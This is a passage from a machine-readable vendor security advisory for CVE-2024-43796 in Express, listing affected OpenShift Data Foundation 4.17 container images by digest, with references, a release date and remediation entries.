"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", 